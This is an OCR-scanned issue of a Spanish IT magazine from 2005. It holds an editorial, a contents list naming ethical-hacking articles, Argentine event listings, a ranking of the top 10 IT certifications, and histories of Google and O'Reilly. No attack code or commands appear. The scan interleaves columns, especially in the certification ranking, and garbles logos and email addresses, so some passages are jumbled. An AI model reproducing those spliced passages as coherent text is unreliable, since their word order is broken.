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EDITORIAL 


En esta edición, se han incluido tres nuevas secciones que aparecerán en 
forma regular y que creemos le serán de interés: “Libros”, “Gente e Historia 
en IT” y “Eventos”. 

En la sección “Libros”, en este ejemplar, se analiza la excelente colección 
escrita por Andrew S. Tanenbaum y que son usados en la mayoría de las 
universidades del mundo como libros de texto. Indagamos quien es 
Tanenbaum y su influencia sobre Linus Torvals en la creación de Linux a 
través de Minix. Además se analiza en detalle un reciente libro de seguri- 
dad propuesto por Mc Graw Hill con colaboración de Panda Software (ori- 
ginal en castellano): “Seguridad Informática para empresas y particulares”. 
Da con mucho nivel, desde una óptica diferente, toda la temática de segu- 
ridad informática. 

En “Gente e historia en IT” iremos conociendo de las vidas y logros de 
quienes, con sus creaciones han modificado el mundo IT. Google, la edito- 
rial O'Reilly y el creador de la WWW estarán presentes en esta edición. 
Antes de pasar de lleno al Vol. 2 de Ethical Hacking investigamos dos 
temas: la tecnología Grid Computing que muy pronto revolucionará el con- 
cepto de redes y como se desarrollaron dos grupos de “Hackers” que 
desde 1984 han tenido gran influencia y son considerados referentes en el 
mundo IT. Ellos son cDc (Cult of the Dead Cow) y The LOpht. Lo interesan- 
te es ver como su historia se une a Hobbit, Weld Pond, atstake, Symantec 
y netcat 

En el Vol. 2 de Ethical Hacking se desarrollan una serie de artículos sobre 
fundamentos de seguridad informática. Finalmente vemos en detalle herra- 
mientas forenses y netcat y las metodologías de exploits de vulnerabilida- 
des en Sistemas Operativos Windows y UNIX-like. Incluimos un artículo in- 
troducción a aspectos legales en Internet y que será el comienzo de una 
serie sobre el tema. 

¿Que habrá en nuestro NEX + 15?. NEX +15 versará sobre temas varia- 
dos pero contendrá un complemento a los Vols 1 y 2 de Ethical Hacking. 
La razón es que faltan desarrollar una serie de temáticas muy importantes. 
Llamaremos a esto Vol 3. Fundamentalmente incluirá temas como: comu- 
nicaciones seguras (SSL, SSH), e-mail seguro, almacenamiento de datos. 
Otros temas ya vistos serán desarrollados en mayor detalle: 1DS (Intrution 
Detection Systems), Buffer overflows, DoS (Denial of Servic), Spoofing, 
Hijacking de sesión, Honey Pots y Sniffers 

Así quedará con los tres volúmenes (Vols. 1, 2 y 3), completa una unidad 
de conceptos . 

¿Hay más en seguridad informática? Por supuesto. Y lo desarrollaremos 
en los NEX siguientes pero ya sobre una base a la cual podremos hacer 
referencia. 

Les pedimos, que no dejen de enviar sus comentarios y sugerencias. 


. 


Una VPN (Virtual Private Network) es una red (network) de 
datos privada que brinda a una empresa las mismas posibi- 
lidades que las líneas privadas bajo leasing a un costo mu- 
chísimo más bajo, utilizando la infraestructura pública com- 
partida (un ejemplo: Internet). Damos una introducción al 
tema y analizamos la rica variedad de opciones que nos dan 
las VPNs bajo Linux. 


///ISUMARIO 


Aprenda cuáles son las certificaciones internacionales del mundo 
IT más buscadas. El estudio se basa en el crecimiento, reputa- 
ción de éstas por parte de quienes hoy participan activamente del 
mercado informático. 


Pág. 16 Grid Computing 


Entienda qué es esta tecnología emergente que transformará el 
mundo de la infraestructura de redes y que aprovecha al máximo 
los recursos informáticos ya existentes. 

David Yanover, director de mastermagazine.info nos brinda una 
introducción al tema. 


Pág. 20 cDc (Cult of the Dead Cow), 
the LOpht y Netcat 


Conozcamos la historia de cDc y su relación con “The LOpht”, 
adtake, symantec y la herramienta de seguridad informática más 
completa que existe: “netcat” 
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Paso 6: Hacking NT, 2K y Windows 2003. 

Parte 2 de 2: Ataques autenticados contra sistemas 
Windows NT/2000/2003. 

Paso 7: Hacking Unix 

Parte 1 de 2: Acceso Remoto. 


Pág. 28 Esteganografía 


La palabra es bastante difícil de recor- 
dar y puede confundir pero la utilidad de 
la Esteganografía en los tiempos en que 
vivimos se está haciendo cada vez más 
importante. En este artículo veremos de 
qué se trata y sus aplicaciones. 


Pág. 32 Biométrica 


Cuando usadas en seguridad informáti- 
ca, las técnicas biométricas sirven para 
identificar los individuos por medio de 
características fisiológicas. Aprenda 
cuáles y cómo complementan otros 
medios de autenticación. 


Pág. 38 Pass Phrases 


Parte 2 de 3. Las Pass Phrases están 
de moda por un número de razones, 
una es el desarrollo de herramientas 
que pueden crackear muchos pass- 
words en minutos. ¿Representan más 
seguridad que las passwords conven- 
cionales? 


Pág. 41 Privacidad 


Muchos ya saben que al navegar en 
Internet se dejan huellas pero, lo que tal 
vez no consideren en profundidad, es que 
un individuo que recolecte toda esta infor- 
mación puede llegar a conocer la identi- 
dad real de la persona. 


Pág. 45 y 48 IPsec 1 y Il 


lPsec es una de las tecnologías más 
útiles de seguridad de redes. En la parte 1 
de esta serie, se presenta la tecnología y 
en la parte 2 se exploran algunas posibili- 
dades muy útiles que podrán ayudarlos a 
solucionar problemas de seguridad vigen- 
tes. 
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Todos los días nace una nueva forma de delinquir dejando 
consecuencias gravosas, ya sea atacando a las redes o a 
los usuarios en general. La legislación avanza más lento que 
la tecnología informática generando con ello una zona libe- 
rada para la consumación de los delitos. 


El artículo “Elementos de Criptografía l"nos dio el basamen- 
to para entender los conceptos de firma digital y Key 
Exchange. Sigue aprender sobre otros conceptos clave: el 
certificado y los CA (Certificate Authority). Finalmente, ¿qué 
es PKI?. En este artículo, se elaboran los conceptos anterio- 
res dando ejemplos de donde se implementa esta infraes- 
tructura. PGP y su historia nos complementa todo lo anterior. 


Eventos 


SEGURINFO 2005 
15 de Marzo de 2005 SEGURINFO 2005 
Sheraton Buenos Aires E 
Usuaria organiza esta Jornada con el objetivo de ayudar a los 
CIOs de las empresas, Directores y usuarios de tecnología a vi- 
sualizar estos problemas, y encontrar las soluciones adecuadas 
Informes 

Tel: 4951-2631 / 4954-4424 segurinfo(Musuaria.org.ar 
www.segurinfo.org.ar 


pQ 


CRISOL 
1er. Encuentro Estratégico Argentino de Software Libre que se 


http://www.crisolargentina.org.ar/node/2 
TRABAJO IT jornada 2005 
12 de Abril 2005 


Jrabajo IT 
Sheraton Libertador 


Tiene el objeto de juntar bajo un mismo techo a más de 1200 
profesionales y postulantes del mercado laboral IT argentino y 
a las empresas líderes que los necesitan. 

Informes 

4803-6100 mgparra(Qworktec.com.ar 


INNOVAO05 

21 de Abril 2005 

UTN Buenos Aires 

Jornada ideada para que las empresas muestren sus nuevos 
proyectos y avances tecnológicos a la comunidad 
Universitaria. 

Informes 

4803-6100 mgparra(Qworktec.com.ar 


MOVIL 2005 

25 y 26 de Abril de 2005 

Sheraton Hotel Buenos Aires. 

Dos días de conferencias con oradores líderes del mercado que 
analizarán el nuevo escenario de acción y el futuro del negocio 
Informes 

4345-3036 eventomovilGYconvergencia.com.ar 


Redes de Gobierno2004 

19 y 20 de Mayo 2005 

Predio Ferial de Buenos Aires 

Informes 

4345-3036 eventos(Wconvergencia.com.ar 


EXPOMATICA 2005 

19 al 22 de Mayo de 2005 

Sheraton Hotel Córdoba, Av. Duarte Quirós 1300. 

El Objetivo de la exposición es allegar a las marcas y mayoris- 
tas al canal del Interior del país, conseguir contactar directa- 
mente los proveedores de IT con las empresas 

Informes 

0351-4723053 expomatica(Ojointgroup.com.ar 
www.expomatica.com.ar 


Segundo Congreso Nacional de Software Libre: USUARIA 
6 y 7 de Junio 2005 

Buenos Aires Sheraton Hotel, 

Su enfoque se dirige hacia cuatro grandes y diversos planos 
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(Estrategias, Soluciones Reales, Tecnología y Migraciones) 
Informes 

www.softlibre.org.ar 

USUARIA: Rincón 326 (C1081ABH) - Capital Federal 


NETWORKERS SOLUTIONS FORUM 2005 

6 al 9 de Junio de 2005 

Hotel Hilton de Buenos Aires, Argentina 

Los temas: Telefonía IP, Seguridad y Manager Services. 
Informes 
www.cisco.com/ar/networkers/registration.html 


COSENTIC 05 

Congreso de Seguridad en Tecnología de Información y 
Comunicación 

7 y 8 de Junio 2005 

Sheraton Libertador 

Tiene el objeto de profundizar y educar sobre la necesidad y 
problemática de la seguridad de la información a directivos de 
sistemas y administración y finanzas, ejecutivos y consultores. 
Informes 

4803-6100 mgparra(Qworktec.com.ar 


Internet — 3 Jornadas de Reflexión y Negocios en Internet 
24 de Junio 2005 

Marriot Plaza Hotel 

Informes 

4345-3036 eventos(Mconvergencia.com.ar 


Telefonía IP — La convergencia Total 

24 y 25 de Agosto de 2005 

Sheraton Hotel — Buenos Aires 

Oportunidad de capacitación y actualización junto a los líderes 
del sector. La audiencia más calificada. 2004: 470 asistentes. 
19 sponsors. 12 workshops. 

Informes 

4345-3036 eventosODconvergencia.com.ar 


TECNOAR 2005 - 2? EXPOSICIÓN NACIONAL DE 
INFORMÁTICA Y TECNOLOGÍA 

1, 2 y 3 de septiembre de 2005. 

Patio de la Madera de la ciudad de Rosario 
Informes 

www.tecnoar.org.ar infofWtecnoar.org.ar 


EXPOCOMMI 2005 

27 al 30 de septiembre de 2005 

La Rural, predio ferial de Palermo 

Por 4to año consecutivo será el lugar para conocer las solucio- 
nes de redes empresariales que pueden cambiar el ritmo de los 
negocios de su empresa. 

Informes 

www.expocomm.com.ar 

infoexpocomm(WDejkreed.com 


6ta Jornada de Tecnologías de Internet 

13 de Octubre 2005 

Sheraton Libertador 

Jornada Universitaria de actualización sobre tecnologías de 
Internet 

Informes 

4803-6100 mgparraQworktec.com.ar «| 
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Seguridad y Educación se fusionan en Latinoamérica 


Microsoft, el Tecnológico de Monterrey y la empresa Módulo presentan la 
Academia Latinoamericana de Seguridad Informática 


Academia Latinoamericana 
de Seguridad informática 


Personas + Procesos Excelencia. académica 
Liderazgo en Seguridad Informática 


241 1 PA 1 


an e 


Con el objetivo de formar líderes en Seguridad Informática, que 
apoyen la creación de un ecosistema seguro, Microsoft Latinoamérica, 
el Tecnológico de Monterrey y Módulo se dieron a la tarea de concen- 
trar conocimientos, procesos y relaciones con las comunidades técni- 
cas en sus áreas de especialidad, para brindar a los profesionales en 
tecnología las herramientas necesarias que los ayuden a alcanzar sus 
objetivos individuales y los de sus empresas, a través de un novedoso 
programa académico de excelencia. 


“La Academia Latinoamericana de Seguridad Informática” se compone 
de tres etapas,que van aumentando el nivel de complejidad conforme 
se va avanzando. 


Iniciando con un curso de Introducción que involucra conocimientos 
básicos en Seguridad, seguido por una Capacitación en arquitectura y 


netWorkers 


cerrando con un Entrenamiento práctico para preparar la certificación 
en seguridad, los participantes irán cursando una etapa a la vez, las 
cuales se evaluarán de forma individual hasta alcanzar los 3 niveles y 
lograr completar las 50 horas, distribuidas en 12 semanas, que tiene 
de duración todo el programa. 


“El Tecnológico de Monterrey, a través de la Universidad Virtual, ha 
estado trabajando junto con Microsoft en el proyecto de la Academia 
Latinoamericana de Seguridad, para implementar el innovador 
modelo educativo: enseñanza - aprendizaje, con el cual estamos con- 
tribuyendo a la integración y desarrollo de la comunidad de habla 
hispana en América Latina, que está interesada en capacitarse en 
Seguridad informática”, comentó Patricio López del Puerto, rector de 
la Universidad Virtual, del Tecnológico de Monterrey. 


“La vinculación Empresa-Academia, en la que ambas instituciones 
están participando al ofrecer, por nuestra parte un proceso educativo 
de excelencia y por Microsoft su relación con la comunidad de profe- 
sionales en Tl junto con recursos tecnológicos, impulsarán sin duda, 
la formación de líderes dentro de área, beneficiando con ello a gran 
parte de la población de la región y por supuesto a la industria”. 


La 1?. Generación de la Academia Latinoamericana de Seguridad 
Informática inicia oficialmente su primera etapa el 10 de Enero de 
2005, para participar en este programa, sólo es necesario contar con 
conocimientos técnicos, disponibilidad de tiempo para dedicarle a los 
cursos y registrarse en: 


http://www.mslatam.com/latam/technet/cso/HtmI-ES/home.asp 


Cisco SYSTEMS 


Networkers Solutions Forum es el evento en el que podrá desarrollar los conocimientos necesarios para llevar exito- 
samente su empresa a través de la dinámica Economía Global de Internet. Es la conferencia más importante de usuarios para 
profesionales en redes, y su oportunidad para obtener el entrenamiento y la información necesaria para estar actualizado acerca 


de tecnologías, soluciones y productos Cisco. 


Durante los dos días de Networkers Solutions Forum, usted podrá: 


Elegir entre más de 25 sesiones de entrenamiento especializadas. 
Como actividad adicional a desarrollarse el día 6 de junio, podrá inscribirse a los Techtorials (Power Sessions), cursos técnicos 


intensivos de un día completo de duración. 
Impulsar su carrera con Exámenes de Certificación Cisco. 


Visitar las Clínicas de Diseño, donde podrá discutir soluciones específicas a sus problemas de redes con expertos certificados de Cisco. 
Descubrir soluciones que podrá implementar en la red de su empresa para incrementar el éxito en sus negocios. 

Aprender de implementaciones exitosas para maximizar la operación de su red. 

Llevar a cabo reuniones Uno-a-Uno con ingenieros y desarrolladores de Cisco. 

Escuchar a los altos ejecutivos de Cisco presentar su visión del futuro en las Conferencias Plenarias. 

Visitar el Technology Showcases, donde los Partners de Cisco demostrarán sus productos, servicios y soluciones. 

Relacionarse con otros profesionales de la industria en las diferentes sesiones, en el Technology Showcase y en los eventos especiales. 
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Las 10 Certificaciones más buscadas para 2005 


El presente artículo está basado en un estudio elaborado y publicado anualmente por CertCities.com (http://certcities.com/editorial/fea- 
tures/story.asp ?EditorialsID=55). 


El estudio se basa en el crecimiento, reputación y aceptación de la industria para con las certificaciones disponibles en el mercado de 
IT. A esto se le agregaron otros factores: utilidad, ¿puede hacer una diferencia en la carrera?, ¿cuál se destacará más? Aunque el 
estudio fue hecho en US creemos es de mucho interés para el mercado local. Si vio alguna vez alguno de los reportes anteriores 
(2004, 2003, 2002) de esta empresa, entonces sabe que "la más buscada" no significa la más popular, porque si hicieran un simple 
conteo de las certificaciones más alcanzadas se obtendría el mismo resultado año tras año. Esto es, en cambio, un pronóstico de las 
certificaciones que creen que más crecerán en el 2005. 

La base de este reporte es la encuesta anual que esta empresa realiza con sus lectores. Para cada una de las aproximadamente 70 
certificaciones, comparan el número de personas que obtiene cada título con los que dicen que desean obtenerlo en el plazo de los 
próximos 12 meses. Para las certificaciones que muestren un crecimiento positivo, ubican los datos en una escala de 1 a 20 (donde 
20 es el de más crecimiento), y lo llaman "Nivel de Interés del Lector". 

Después viene el conteo de comentarios: ¿Qué dice la gente sobre una certificación en particular? ¿Qué reconocimiento han recibido 
estos títulos recientemente? ¿Qué piensan los redactores y columnistas de CertCities.com de estas credenciales? Después de inves- 
tigar en la Web y de consultar con los expertos, asignan a cada certificación un "Conteo de Comentarios" que va de 1 a 10 (donde 10 
es el mejor). Al juntar el "Nivel de Interés del Lector" y el "Conteo de Comentarios", se obtienen las "10 Certificaciones más buscadas 
para 2005" que en este caso son las siguientes: 


obtener o a conservar posiciones de trabajo. Y no es difícil de 
obtener este título de Gerente de Proyecto, que ha mantenido 
su reputación desde 1984. 

Instructores y columnistas de Linux de CertCities.com opinan 
que las "soft skills", tales como Gerencia de Proyecto, 
siempre tendrán demanda. Mientras que otros vendors han 


10 : Project Management Professional (PMP) 


Vendor: Project Management Institute 
Nivel de Interés del Lector (sobre 20): 7 
Conteo de Comentarios(sobre 10): 7 


Esta certificación 
(que no pertenece 
al mundo de IT) 
llamó la atención - 


Total: 14 
O por segundo año 


AN 
consecutivo- lo 


suficiente como para acceder a un puesto en esta lista, 
gracias al creciente interés que tienen los profesionales en 
ganar "soft skills" (habilidades suaves) para ayudarles a 


9” : Security+ 


Vendor: Computing Technology Industry Association 
Nivel de Interés del Lector (sobre 20): 10 

Conteo de Comentarios (sobre 10): 5 

Total: 15 


No se puede 


POD CompTIA. cenñcaión “de 


vendor neutral es 
popular. Es una de las certificaciones más populares apareci- 
das en los últimos años. Mientras que muchos obtuvieron la 


8” : MySQL Core Certification 


Vendor: MySQL AB 

Nivel de Interés del Lector (sobre 20): 13 
Conteo de Comentarios (sobre 10): 3 
Total: 16 


A esta certificación le fue muy bien en el 

Ú "Nivel de Interés del Lector" ya que es 

una credencial sólida que los em- 

MUySGIL.: pleadores están utilizando para determi- 
nar si los candidatos tienen el 

conocimiento necesario para instalar y para mantener sus 
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intentado certificaciones de Gerencia de Proyecto, la re- 
putación del PMI está decididamente en primer lugar. Esta 
tiene valor no solamente por ser una prueba en el 
conocimiento sobre la gerencia de un proyecto, sino también 
porque requiere una cantidad significativa de experiencia do- 
cumentada, ya que últimamente se exige más de los encar- 
gados de proyecto, para que los más experimentados y bien 
informados puedan distinguirse de la mayoría. 


certificación el año pasado, otros tantos todavía tienen planes 
para alcanzarla, por eso ingresó en la lista este año. 

Los expertos aseguran que hace diez años, un empresario 
cubría sus necesidades contratando a un administrador que 
pudiera instalar una red, pero hoy en día, desea un admi- 
nistrador que le asegure que su red y sus datos estén 
seguros. Una certificación de seguridad de nivel inicial se 
convertirá en un requisito previo para la contratación de em- 
pleados, a la misma altura que el título de la escuela secun- 
daria. 


bases de datos de MySQL. Pero es un título relativamente 
nuevo que no ha llamado mucha la atención, quizás porque el 
OCP DBA de Oracle y MCDBA de Microsoft continúan gober- 
nando el rubro de certificaciones de bases de datos. Al ver 
cómo MySQL crecía en renombre, no se esperaba que su cer- 
tificación se quedara atrás, considerando especialmente que 
las certificaciones no tienden a apuntar a la comunidad de 
OpenSource. Esta certificación tiene total sentido, es un pro- 
ducto muy popular, pero es una base de datos, por lo tanto es 
compleja, no es sólo apretar un par de botones para comple- 
tar la instalación. Las compañías están apostando su negocio 
a este producto, así tienen que tener una manera de iden- » 
tificar a los individuos que pueden instalarla y mantenerla. 


7 : Novell Certified Linux Professional (Novell CLP) 


Vendor: Novell 


Nivel de Interés del Lector (sobre 20): 11 
Conteo de Comentarios (sobre 10): 6 
Total: 17 


Hasta el año pasado, nadie hubiera pensado 
que una credencial de Novell sería considera- 
da como una de las más buscadas. Bueno, 
sorpréndanse, porque este nuevo título de 
Novell aterrizó firmemente en el No. 7 de la 
lista de este año. Sabemos que Novell está 


6” : Linux Professional Institute Level 2 (LPIC-2) 


Vendor: Linux Professional Institute 

Nivel de Interés del Lector (sobre 20): 12 
Conteo de Comentarios (sobre 10): 6 
Total: 18 


su Esta credencial, desarrollada y patrocinada 

por la comunidad de Linux, seguramente 

fue buscada por muchos seguidores de 

este ranking en los últimos años. 

Finalmente los resultados de las encuestas 

le han dado su oportunidad gracias al cre- 

The Linax cimiento del interés del lector en este título. 
Profcadonal Muchos de los redactores de 
IrstlMate CertCities.com son sus fans desde hace 


5” : Cisco Certified Network Professional (CCNP) 


Vendor: Cisco 

Nivel de Interés del Lector (sobre 20): 13 
Conteo de Comentarios (sobre 10): 7 
Total: 20 


Se sabe que el título es my codiciado: 
Los empleadores buscan el 
conocimiento exacto que evalúa esta 
certificación, y si se trata de la 


columna vertebral de su red, esas ha- 
bilidades son especialmente impor- 
tantes. 


4” : Cisco Certified Security Professional (CCSP) 


Vendor: Cisco 
Nivel de Interés del Lector (sobre 20): 14 
Conteo de Comentarios (sobre 10): 8 
Total: 22 


Sí, una certificación de Cisco superada por otra certificación 
de Cisco. El año pasado, CCSP era 
demasiado nueva como para entrar 

A en el ranking, pero este año, se en- 
cuentra en el 4* lugar! Y esto sucede 


por lo siguiente: reúne dos de las 
áreas más buscadas del mundo IT: la 
de Cisco y la de la seguridad. 

A pesar de los resultados, podemos 


ver que no hay un buen "Conteo de Comentarios" detrás de 
esta certificación. Para obtenerla, usted debe primero obtener 


detrás de las nuevas iniciativas de Linux (incluyendo este 
título) y su certificación hermana, Linux Certified Engineer 
(CLE), y le fue muy bien en el "Conteo de Comentarios". 
Además hay dos puntos importantes: primero, tiene un costo 
muy accesible (U$S 195) para ser un examen "hands on" y 
segundo, hay muchos seguidores de Novell deseosos de 
pasarse al código abierto, así que habrá una demanda de ad- 
ministradores que tendrán que conocer no sólo Linux sino el 
Linux de Novell. 


mucho tiempo. De hecho, LPIC-2 es la única de unas pocas 
certificaciones en figurar en el TOP 10 de todos los que par- 
ticipan en la creación de este ranking. Esta es una gran certi- 
ficación pero que tiene muy poca promoción y no muy buenos 
materiales de estudio, pero gracias al apoyo de Novell, se 
espera que consiga entrar en la corriente principal y que sea 
reconocida por los que ahora la están pasando por alto. Si 
usted está interesado en esta certificación, no deje de ingre- 
sar al sitio del LPI, (www.Ipi.org) ya que ofrecen regularmente 
descuentos e incluso exámenes gratis en todo el mundo en 
eventos y demostraciones comerciales 


CCNP simplemente parece tenerlo todo. 

Hay un mercado simplemente interminable para este título de 
nivel medio de Cisco. Seguramente muchos alcanzan esta 
certificación cada año, pero aún así muchos más la fijan como 
su meta. Si le agregamos a esto su excelente reputación (sin 
mencionar su nivel de dificultad), no es ninguna locura que 
CCNP haya estado en nuestra lista de certificaciones por los 
últimos cuatro años consecutivos. 


CCNA o CCIP, después aprobar cinco exámenes requeridos: 
Securing Cisco IOS Networks 

Cisco Secure PIX Firewall Advanced 

Cisco Secure Intrusion Detection System 

Cisco Secure VPN 

Cisco SAFE Implementation 

Eso es un examen más que en cualquier otra certificación de 
nivel medio de Cisco. Y, por supuesto, todos estos exámenes 
tienen preguntas “hands on” (al igual que la mayoría de las 
pruebas de Cisco) y tiene detrás la reputación del nivel de di- 
ficultad de Cisco. Tiene mucha razón de ser, especialmente 
en el mercado de hoy, ya que cuando se contratan gerentes, 
si se piensa en Internet y en aplicaciones de red, se piensa a 
menudo en el hardware de Cisco, con la seguridad siendo un 
asunto tan requerido este último tiempo (en niveles muy di- 
versos), la combinación de seguridad y Cisco en una sola cer- 
tificación debe hacer la diferencia entre los que tomen de- 
cisiones de contratación. > 


> PS 
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3” : Red Hat Certified Engineer (RHCE) 


Vendor: Red Hat 

Nivel de Interés del Lector (sobre 20): 16 
Conteo de Comentarios (sobre 10): 7 
Total: 23 


RHCE sigue siendo este año una de 

(d) las certificaciones TOP. Dos razones 

% redhat suman: es una certificación que 

incluye un examen con laboratorio 

práctico (hands-on lab) y pesa el renombre de los productos 
de Red Hat. 

Muchos expertos la colocan entre sus preferidas ya que ven 


la atracción que provoca el título a nivel corporativo. 
Sin discusión, la certificación Red Hat es hoy la más impor- 


2” : Microsoft Certified Systems Engineer: Security 


Vendor: Microsoft 

Nivel de Interés del Lector (sobre 20): 17 
Conteo de Comentarios (sobre 10): 7 
Total: 24 


MCSE: Security seguirá creciendo 
con la misma rapidez que hasta 
ahora puesto que los nuevos profe- 
sionales de IT que ya están trabajan- 
do para obtener MCSE, seguramente elijan sus electivos para 
obtener esta especialización. 


tante para Linux. 

Quien posee la certificación RHCE posee los conocimientos 
técnicos de un System Administrador Senior junto a la capaci- 
dad de configurar servidores, servicios en red, seguridad y 
troubleshooting. Un RHCE puede tomar decisiones sobre que 
servicios deben implementarse en un ambiente corporativo. 
Posee conocimientos profundos de DNS, NFS, Samba, 
Sendmail, Postfix, Apache y seguridad informática. 

Los beneficios de esta certificación son numerosos, tanto a 
nivel de la persona que la posee y de la organización donde 
este trabaja. 

Para conocer sobre cursos y exámenes en Argentina visitar: 
http://www. rhla.com/training 


Muchos se estarán preguntando si no es esta la certificación 
que estaba al tope del ranking el año pasado. Sí, es la 
misma, y sí hay motivos para que vuelva a estar este año, 
aunque esta vez en el 2” puesto. Sinceramente se entiende 
perfectamente porqué tantos desean obtener este título: 
Reúne en una sola credencial el conocimiento de el sistema 
operativo top del mercado con el tan perseguido tema de la 
seguridad, pero además permite que usted la obtenga sin 
pasar con el proceso de obtener una certificación separada, 
simplemente debe elegir correctamente sus exámenes elec- 
tivos y puede obtenerla aprobando casi el mismo número de 
exámenes que aprobaría para acceder a MCSE. 


Y ahora el puesto N' 1 en el ranking de CertCities.com: 


1% : Cisco Certified Internetwork Expert (CCIE) 


Vendor: Cisco 
Nivel de Interés del Lector (sobre 20): 18 
Conteo de Comentarios (sobre 10): 8 
Total: 26 


Después de haber quedado segundo el 

Cisco Systems año pasado, CCIE reclama el puesto más 
alto en nuestra lista del 2005. Sabemos 

cuánto aman todos a esta credencial, 

después de todo, arrasa con el "Nivel de 

Interés del Lector" cada año. Pero la "deseabilidad" no es su- 


GIAC (SANS) Intrusion Analyst 
Check Point Certified Security Expert (CCSE) 


Citrix Certified Internet Architect (CCIA) 


Microsoft Certified Database Administrator (UCDBA) 
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Planet3 Certified Wireless Security Professional (CWSP) 


ficiente para ser un ganador repetido en esta lista. El nivel de 
dificultad es también la llave, y este título lo ha conseguido. 
Simplemente no hay ningún examen de IT más temido que el 
hands on de CCIE, que se rumorea que tiene un nivel de 
aprobación tan sólo del 15 por ciento. Cuando los candidatos 
se consideran afortunados al aprobar un examen de U$S 
1.250 en el segundo intento (sin mencionar el costo de viáti- 
cos para dar exámenes en los pocos puntos de examinación 
que hay en todo el mundo), usted sabe que allí hay prestigio 
y reconocimiento por parte de la industria. 


¿Cuales fueron las certificaciones que por muy poca diferencia no entraron en el ranking de las primeras diez? 


Microsoft Certified Systems Engineer: Messaging (MCSE: Messaging) 


¿Además de las 10 citadas ¿qué certificaciones son importantes en ámbito local de Argentina? 


Oracle Certified Professional Administrador (OCP DBA) (Oracle) 
Sun Certified Java Programmer (SCJP) (de Sun Microsystems) 
CISSP del ISC2 (www.isc2.org). La certificación de seguridad informática más prestigiosa. 4 
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Google Inc. 


Goo E 


Durante 1995, Sergey Brin (23) y Larry Page (24), co- 
fundadores de Google y actualmente presidente y CEO, se co- 
nocieron en un acto que la Universidad de Stanford organiza 
para los candidatos de su Doctorado en Informática. 
Comienzan a trabajar en el “Digital Library Project' de la 
Universidad de Stanford en la creación de un algoritmo para la 
búsqueda de datos. Esta tecnología se convertirá más tarde en 
el corazón que haría funcionar a Google. El nombre que Larry 
Page da a esta tecnología fue 'PageRank'. Al año siguiente co- 
mienzan a desarrollar un buscador llamado 'BackRub' que está 
escrito en Java y Python y corre sobre varias máquinas Sun 
Ultra e Intel Pentium con Linux. La base de datos está alojada 
en un ordenador Sun Ultra ll con 28GB de disco duro. Los pri- 
meros usuarios son los alumnos y profesores de Stanford. 
Para 1997 'Backrub' se transforma en “Google”. Le otorgan este 
peculiar nombre por su parecido a la palabra 'googol”, que en 
inglés es el nombre que se da a la cifra 10 elevado a 100”. Para 
ese año ya tienen indexados 24 millones de documentos. 
Mucho antes, ya habían tenido problemas de capacidad en sus 
discos duros. 

En los comienzos de Google (en el dominio 
google.stanford.edu), su diseño es aún más austero de lo que 
será posteriormente Larry y Sergey han registrado el dominio 
“google.com”. Además, han dado a conocer su tecnología a la 
“Office of Technology Licensing” (OTL) de la Universidad de 
Stanford, que será la encargada de contactar con diferentes 
compañías de Internet que puedan estar interesadas en 
Google. 

Un año después, Sergey y Larry seguían disgustados con las 
ofertas recibidas, por ello, deciden ser ellos los que creen su 
propia empresa. El dormitorio de Larry Page se convierte en el 
nuevo hogar de Google, llevando todos los equipos informáti- 
cos junto a su cama. La habitación de Sergey Brin, al lado de la 
de Larry, es la oficina financiera. En pocos meses Sergey y 
Larry conocen a Andy Bechtolsheim quien les firma un cheque 
por U$S 100.000 a nombre de 'Google Inc.'. Esta empresa, 
como tal, no existe, y para poder cobrar el cheque tienen que 
buscar un local, y fundar una nueva compañía: Google Inc.”. 
Google Inc. abre sus puertas en un garaje. Rápidamente, insta- 
lan varias líneas telefónicas, un cable módem, una línea DSL, y 
un empleado, Craig Silverstein (actualmente, Director de 
Tecnología de Google). Para esta altura se registran 25 millo- 
nes de páginas indexadas, y diez mil consultas por día. 

Para 1999 la plantilla asciende a 8 personas, respon- 
de a 500.000 consultas por día, y deben trasladarse a unas 
nuevas oficinas en Palo Alto, donde firman su primer contrato 
comercial con RedHat, el cual empieza a suministrar el Sistema 
Operativo Linux de los servidores de Google. Mientras tanto, 
continúan con su campaña comercial: “el boca a boca”. En un 
año Google se convirtió en el nuevo motor de búsqueda de 
Yahoo! El portal norteamericano anunció que Google reempla- 
zaría a su tradicional motor de búsqueda Inktomi. Yahoo!, el 
motor de búsqueda más popular según un informe realizado por 
StatMarket, se hace de este modo con otro de los motores de 
búsqueda más populares de Internet, Google. 


A mediados de 2001 Google solicita la patente para 
determinar la relevancia de recursos en Internet mediante su 
motor de búsqueda. El buscador Google incluye desde este 
momento, entre las opciones de búsqueda, los números de te- 
léfonos y las direcciones de los ciudadanos estadounidenses. 
Un nuevo servicio, bautizado como Google Zeitgeist, también 
permite conocer los porcentajes de búsquedas en función de 
las lenguas utilizadas. En esa época se les une Eric Schmidt 
como nuevo director ejecutivo. Google Inc. ya es una puntocom 
rentable, y para el año siguiente se pone en marcha Froogle, el 
nuevo buscador de productos, al mismo tiempo que nace 
Googlenews, el servicio de noticias. Ya llevan 3.083 millones 
de páginas indexadas. Para el 2003 la Oficina de Patentes de 
Estados Unidos otorga a Google la patente de su método para 
determinar la relevancia de recursos en Internet mediante su 
motor de búsqueda. En ese año compran Blogger, que por su 
parecido al nombre de Google merecían entenderse, y son a- 
nunciados por Interbrand como la marca del año 2002, por 
delante de gigantes como Coca-Cola y Starbucks. Apple 
alcanzó el segundo lugar. Aparece en pruebas Google News 
Alerts, un nuevo servicio que nos permitirá estar siempre al 
tanto de lo que sucede sobre un tema especifico. A través del 
correo electrónico y con una gran flexibilidad en la elección de 
la frecuencia (cada día, o cada vez que surja la noticia), nos 
llegará a nuestro buzón de correo electrónico las correspon- 
dientes alertas sobre la palabra seleccionada. Nace también 
este año la nueva barra de Google en español. A principios de 
2004 finalmente Google decide hacer su salida a la Bolsa tras 
muchas especulaciones, en una Oferta Pública de Acciones, 
por valor de 2.700 millones de dólares. 


Editorial O*Reilly 


O'REILLY 


compares books + conferences » ontine publrhing 


Los libros de O'Reilly, conocidos por los animales en sus cubier- 
tas, ocupan un lugar atesorado en los estantes de las bibliote- 
cas de las personas que estén -en mayor o menor grado- rela- 
cionadas con IT (Information Technology-Tecnologías de la 
Información). Pero esto no es todo, O'Reilly tiene además, pu- 
blicaciones On-Line y Conferencias. 

Los libros de la compañía, las conferencias, y los sitios web 
traen a la luz el conocimiento de este sector. En ese entonces 
pensaban simplemente en licenciar los libros a otros vendors 
(término utilizado para referirse a los fabricantes-desarrollado- 
res de software-hardware), pero para la segunda mitad de 
1985, una repentina baja en el negocio de consultoría los hizo 
intentar publicar algo de material como libros independientes. 
¡Les fueron arrebatados! Quedó claro que había un mercado 
